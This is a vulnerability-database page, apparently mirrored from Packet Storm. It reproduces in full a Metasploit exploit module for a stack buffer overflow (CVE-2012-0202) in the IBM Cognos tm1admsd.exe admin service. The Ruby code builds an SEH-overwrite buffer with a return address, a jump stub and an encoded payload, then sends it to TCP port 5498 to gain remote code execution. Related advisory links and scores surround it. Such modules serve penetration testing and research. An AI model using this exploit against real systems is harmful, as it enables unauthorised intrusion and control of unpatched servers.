Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormUnknownPACKETSTORM:119330
HistoryJan 08, 2013 - 12:00 a.m.

IBM Cognos tm1admsd.exe Overflow

2013-01-0800:00:00
unknown
packetstormsecurity.com
20

0.968 High

EPSS

Percentile

99.7%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'IBM Cognos tm1admsd.exe Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in IBM Cognos Analytic Server  
Admin service. The vulnerability exists in the tm1admsd.exe component, due to a  
dangerous copy of user controlled data to the stack, via memcpy, without validating  
the supplied length and data. The module has been tested successfully on IBM Cognos  
Express 9.5 over Windows XP SP3.  
},  
'Author' =>  
[  
'Unknown', # Original discovery  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2012-0202'],  
['OSVDB', '80876'],  
['BID', '52847'],  
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-101/'],  
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21590314']  
],  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'SSL' => true,  
'SSLVersion' => 'TLS1'  
},  
'Payload' =>  
{  
'Space' => 10359,  
'DisableNops' => true  
},  
'Platform' => 'win',  
'DefaultTarget' => 0,  
'Targets' =>  
[  
# tm1admsd.exe 9.5.10009.10070  
# ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates  
[ 'IBM Cognos Express 9.5 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 10359 } ]  
],  
'DisclosureDate' => 'Apr 02 2012'))  
  
register_options([Opt::RPORT(5498)], self.class)  
end  
  
def exploit  
  
sploit = payload.encoded  
sploit << rand_text(target['Offset'] - sploit.length)  
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']}").encode_string  
sploit << "\xEB\xF9" + rand_text(2) # jmp $-5  
sploit << [target.ret].pack("V") # seh  
sploit << rand_text(2000) # Trigger exception  
  
data = rand_text(4)  
data << "\x00\x08" # Opcode  
data << [sploit.length].pack("n") # Length  
data << sploit # Value  
  
length = [data.length + 2].pack("n")  
  
req = length  
req << data  
  
connect  
sock.put(req)  
disconnect  
  
end  
end  
  
`

Related

saint 4
prion 1
cvelist 1
cve 1
checkpoint_advisories 1
nvd 1
zdi 1
ibm 1
saint
saint
IBM Cognos TM1 and Express Admin Server Buffer Overflow
2012-12-27 00:00:00
IBM Cognos TM1 and Express Admin Server Buffer Overflow
2012-12-27 00:00:00
IBM Cognos TM1 and Express Admin Server Buffer Overflow
2012-12-27 00:00:00
prion
prion
Stack overflow
2012-05-04 16:55:00
cvelist
cvelist
CVE-2012-0202
2012-05-04 16:00:00
cve
cve
CVE-2012-0202
2012-05-04 16:55:01
checkpoint_advisories
checkpoint_advisories
IBM Cognos tm1admsd.exe Buffer Overflow (CVE-2012-0202)
2013-08-25 00:00:00
nvd
nvd
CVE-2012-0202
2012-05-04 16:55:01
zdi
zdi
IBM Cognos tm1admsd.exe Multiple Operations Remote Code Execution Vulnerabilities
2012-06-27 00:00:00
ibm
ibm
Security Bulletin: IBM Cognos TM1 Admin Server vulnerabilities (CVE-2012-0202)
2018-06-15 22:13:43

0.968 High

EPSS

Percentile

99.7%

JSON
Related for PACKETSTORM:119330
saint4prion1cvelist1cve1checkpoint_advisories1nvd1zdi1ibm1